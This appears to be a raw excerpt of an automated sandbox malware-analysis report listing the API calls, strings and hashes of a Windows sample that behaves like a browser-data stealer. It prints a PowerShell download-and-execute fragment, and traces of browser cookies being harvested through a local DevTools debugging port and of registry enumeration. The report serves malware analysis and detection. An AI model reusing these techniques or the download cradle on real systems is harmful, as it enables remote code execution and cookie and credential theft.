                                • Instruction Fuzzy Hash: BC11B172DA2B14AFD731DFB4A80DA593AB8BA0971A3549C1BF1D5F2148D7FE4000DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5BE53
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E5BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E5BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5BEEB
                                • lstrlen.KERNEL32(')"), ref: 00E5BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 00E5BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E5BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E5BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 00E5C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 05b3ad77653bfbf0fee836458cb24cb99e442f15bf6da10226f95ab348a1a6d4
                                • Instruction ID: 02e422a603a052b1994a12a67408ed5da82ee8b01376977451714798bde7853c
                                • Opcode Fuzzy Hash: 05b3ad77653bfbf0fee836458cb24cb99e442f15bf6da10226f95ab348a1a6d4
                                • Instruction Fuzzy Hash: EE61C771E10209AFCB21AFB4AC495AF7BF9AF04319F146829FE45F7241DB34D9058BA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6184F
                                • lstrlen.KERNEL32(016B6EF0), ref: 00E61860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E618C1
                                • lstrlen.KERNEL32(00E74FA0), ref: 00E618D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E618F4
                                • lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E61900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6192F
                                • lstrlen.KERNEL32(016B6FC0), ref: 00E61945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E619A6
                                • lstrlen.KERNEL32(00E74FA0), ref: 00E619B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E619D9
                                • lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E619E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A14
                                • lstrlen.KERNEL32(016B6F20), ref: 00E61A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A8B
                                • lstrlen.KERNEL32(016B7020), ref: 00E61AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61B02
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 4bbec5546bb9a76f80288810f44a24dd2a53b47eaecb358259f4c542292b02bf
                                • Instruction ID: 3332d117f83689e12d99003c2e6bfd7b8230656a896f5dbfb816bdb7c3a9b679
                                • Opcode Fuzzy Hash: 4bbec5546bb9a76f80288810f44a24dd2a53b47eaecb358259f4c542292b02bf
                                • Instruction Fuzzy Hash: D4915170A413029FD7319FB9FC88A1677E8AF54358B18A86DB9C6F3245DB35E841CB60
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E547C5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54812
                                • lstrlen.KERNEL32(00E74B60), ref: 00E5481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5483A
                                • lstrcat.KERNEL32(00000000,00E74B60), ref: 00E54846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E548A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E548CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 00E548DC
                                • lstrlen.KERNEL32(?), ref: 00E548F0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54931
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E549B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E549E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: a2d64443a85b9022eb0bd79c99e2dde5cf1db58df5f76f8fed1a7a6c674406d8
                                • Instruction ID: 0fde347cac1bcd3140c67f14c0df7650f70614638ae894b208587f15dc964a7d
                                • Opcode Fuzzy Hash: a2d64443a85b9022eb0bd79c99e2dde5cf1db58df5f76f8fed1a7a6c674406d8
                                • Instruction Fuzzy Hash: A8B191B1A112059BCB31EF78E88A9AE77F5AF44309F446828FD46B7341DB34ED458B90
                                APIs
                                  • Part of subcall function 00E490C0: InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E490DF
                                  • Part of subcall function 00E490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E490FC
                                  • Part of subcall function 00E490C0: InternetCloseHandle.WININET(00000000), ref: 00E49109
                                • strlen.MSVCRT ref: 00E492E1
                                • strlen.MSVCRT ref: 00E492FA
                                  • Part of subcall function 00E48980: std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                • strlen.MSVCRT ref: 00E49399
                                • strlen.MSVCRT ref: 00E493E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00E49547
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E49559
                                • lstrcat.KERNEL32(?,?), ref: 00E4956A
                                • lstrcat.KERNEL32(?,00E74B98), ref: 00E4957C
                                • lstrcat.KERNEL32(?,?), ref: 00E4958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00E4959F
                                • lstrlen.KERNEL32(?), ref: 00E495B6
                                • lstrlen.KERNEL32(?), ref: 00E495DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E49614
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: cd9b87b41fb874b06fbce1abccc60c51fabac107c4007a42ff488f8bca418b80
                                • Instruction ID: d7608f86ea2ba53e796cf57dba5cd159a5eed8723284258b5d2581bfaace729f
                                • Opcode Fuzzy Hash: cd9b87b41fb874b06fbce1abccc60c51fabac107c4007a42ff488f8bca418b80
                                • Instruction Fuzzy Hash: C0E12770E10218DBDF14DFA8E884ADEBBF5AF48310F1054A9E909B7281DB34AE45CF90
                                APIs
                                • memset.MSVCRT ref: 00E5D9A1
                                • memset.MSVCRT ref: 00E5D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5DA1C
                                • lstrcat.KERNEL32(?,016CEC60), ref: 00E5DA36
                                • lstrcat.KERNEL32(?,?), ref: 00E5DA4A
                                • lstrcat.KERNEL32(?,016CD838), ref: 00E5DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5DA95
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5DAFE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: d449556d00f7a760a55b17efb63152f3edd0b7a46d2022f147f4a1a36df24802
                                • Instruction ID: 483fcd0d0919da2df252285b16fad334ad0103e907038c3d0bd3202a6393e694
                                • Opcode Fuzzy Hash: d449556d00f7a760a55b17efb63152f3edd0b7a46d2022f147f4a1a36df24802
                                • Instruction Fuzzy Hash: 64B1A071D102199FCB20EFA4DC849EEB7B9EF48314F145969F946F3241DA359E48CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B3D9
                                • lstrlen.KERNEL32(00E74C50), ref: 00E4B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B474
                                • lstrcat.KERNEL32(00000000,00E74C50), ref: 00E4B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B4A9
                                • lstrlen.KERNEL32(00000000), ref: 00E4B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B587
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E4B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B622
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E4B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B65E
                                • lstrlen.KERNEL32(?), ref: 00E4B767
                                • lstrlen.KERNEL32(?), ref: 00E4B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B79E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 44f8981bc4124895feecaee17c90fee0dc587dc891496336de38bcb49f41852e
                                • Instruction ID: e71aeb113506b8b558417166cc7d1553dfcb15b1e3034487b47781db031b8dbe
                                • Opcode Fuzzy Hash: 44f8981bc4124895feecaee17c90fee0dc587dc891496336de38bcb49f41852e
                                • Instruction Fuzzy Hash: CB027130A01205CFCB25DF69E588B6AB7F5AF44318F19A06DE909BB352D736DC42CB90
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • RegOpenKeyExA.ADVAPI32(?,016CB398,00000000,00020019,?), ref: 00E637BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00E637F7
                                • wsprintfA.USER32 ref: 00E63822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00E63840
                                • RegCloseKey.ADVAPI32(?), ref: 00E6384E
                                • RegCloseKey.ADVAPI32(?), ref: 00E63858
                                • RegQueryValueExA.ADVAPI32(?,016CEA98,00000000,000F003F,?,?), ref: 00E638A1
                                • lstrlen.KERNEL32(?), ref: 00E638B6
                                • RegQueryValueExA.ADVAPI32(?,016CEAC8,00000000,000F003F,?,00000400), ref: 00E63927
                                • RegCloseKey.ADVAPI32(?), ref: 00E63972
                                • RegCloseKey.ADVAPI32(?), ref: 00E63989
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: ae967592da867711e89fe1fcb9e4bfbf2fc0165195b0beec682d5a013d4f6d53
                                • Instruction ID: 38f723bf16fa8c9bd56f7ec6b6362a9a1cf11a79f5fb8d280dccc9b793337278
                                • Opcode Fuzzy Hash: ae967592da867711e89fe1fcb9e4bfbf2fc0165195b0beec682d5a013d4f6d53
                                • Instruction Fuzzy Hash: EB91A172D402089FCB20DFA4E9849EEB7B9FB88354F149569F609B7205D7319E41CFA0
                                APIs
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E490DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E490FC
                                • InternetCloseHandle.WININET(00000000), ref: 00E49109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00E49166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00E49197
                                • InternetCloseHandle.WININET(00000000), ref: 00E491A2
                                • InternetCloseHandle.WININET(00000000), ref: 00E491A9
                                • strlen.MSVCRT ref: 00E491BA
                                • strlen.MSVCRT ref: 00E491ED
                                • strlen.MSVCRT ref: 00E4922E
                                • strlen.MSVCRT ref: 00E4924C
                                  • Part of subcall function 00E48980: std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: c167377caa15264f3fc9b9e40599451dff8c477e3deef977b48451331e02607b
                                • Instruction ID: c810788f267e6c28c82a0405ad80220d0e53e3c5864f46f2a3d37815cd21d716
                                • Opcode Fuzzy Hash: c167377caa15264f3fc9b9e40599451dff8c477e3deef977b48451331e02607b
                                • Instruction Fuzzy Hash: DA51E371A40305ABDB20DBA8EC49BEEF7F9DB48310F145069F944F3280DBB5AA4487A1
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00E616A1
                                • lstrcpy.KERNEL32(00000000,016BA8C0), ref: 00E616CC
                                • lstrlen.KERNEL32(?), ref: 00E616D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E616F6
                                • lstrcat.KERNEL32(00000000,?), ref: 00E61704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6172A
                                • lstrlen.KERNEL32(016CE818), ref: 00E6173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61762
                                • lstrcat.KERNEL32(00000000,016CE818), ref: 00E6176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61792
                                • ShellExecuteEx.SHELL32(?), ref: 00E617CD
                                • ExitProcess.KERNEL32 ref: 00E61803
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a3bcf04e8ca0024ad4cfd632ac72d8602146770d910d20d09beb737ba837157e
                                • Instruction ID: 1ca60b14314bba16af0883542eedc61fd473cc91997cd70c01634a944b1012bc
                                • Opcode Fuzzy Hash: a3bcf04e8ca0024ad4cfd632ac72d8602146770d910d20d09beb737ba837157e
                                • Instruction Fuzzy Hash: 2451A670D01219AFDB22DFA4E884A9EBBF9AF48344F44516AF605F3345DB35AE01CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E5F026
                                • lstrlen.KERNEL32(00000000), ref: 00E5F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00E5F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 00E5F081
                                • lstrlen.KERNEL32(?), ref: 00E5F094
                                • lstrlen.KERNEL32(00000000), ref: 00E5F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5F13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: d7be49d1c3aa565d7ec60861580f805bb70a791f7bfeec5518f1a24cb4f9d95a
                                • Instruction ID: 2ad2a1a9b66370ce2cd0bd4c5ac2e0552507cdd24bb6c1e336edd3e60db48e0a
                                • Opcode Fuzzy Hash: d7be49d1c3aa565d7ec60861580f805bb70a791f7bfeec5518f1a24cb4f9d95a
                                • Instruction Fuzzy Hash: C95191319112019FCB31AF78E849AAE77E5AF45315F04A56DFE49BB346DB30DC058BA0
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(016C8C28,01079BD8,0000FFFF), ref: 00E4A026
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4A053
                                • lstrlen.KERNEL32(01079BD8), ref: 00E4A060
                                • lstrcpy.KERNEL32(00000000,01079BD8), ref: 00E4A08A
                                • lstrlen.KERNEL32(00E74C4C), ref: 00E4A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A0B2
                                • lstrcat.KERNEL32(00000000,00E74C4C), ref: 00E4A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A114
                                • SetEnvironmentVariableA.KERNEL32(016C8C28,00000000), ref: 00E4A12F
                                • LoadLibraryA.KERNEL32(016B5048), ref: 00E4A143
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
